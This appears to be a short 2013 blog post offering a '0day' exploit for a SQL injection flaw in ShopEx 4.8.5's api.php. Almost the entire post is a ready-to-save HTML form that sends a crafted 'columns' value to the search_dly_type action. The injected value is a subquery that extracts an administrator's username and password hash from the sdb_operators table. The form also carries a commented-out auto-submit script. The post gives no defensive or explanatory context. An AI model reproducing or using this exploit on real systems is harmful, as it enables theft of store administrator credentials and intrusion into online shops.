Technology · 2013 年 8 月 10 日 0

shopex 4.8.5 api.php注入漏洞0day exp

Save as html

<form method='post' action='http://www.hacker-noelle.com/api.php?act=search_dly_type&api_version=1.0'>
<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />
<input type='submit' value='submit' /><br />
</form>
<script>
//document.forms[0].submit()
</script>